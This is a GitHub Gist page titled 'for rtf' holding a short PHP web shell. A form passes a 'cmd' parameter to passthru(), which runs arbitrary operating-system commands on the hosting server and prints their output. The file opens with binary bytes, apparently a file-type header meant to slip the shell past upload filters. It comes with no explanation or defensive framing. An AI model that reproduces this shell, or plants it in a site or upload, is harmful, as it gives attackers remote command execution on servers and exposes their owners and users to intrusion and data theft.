Created
June 18, 2025 12:08
-
-
Save Alakinnn/516a0c9dbc6ac95a96222ae666d1e6d1 to your computer and use it in GitHub Desktop.
for rtf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ���� | |
| <form action="" method="get"> | |
| Command: <input type="text" name="cmd" /><input type="submit" value="Exec" /> | |
| </form> | |
| Output:<br /> | |
| <pre><?php passthru($_REQUEST['cmd'], $result); ?></pre> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment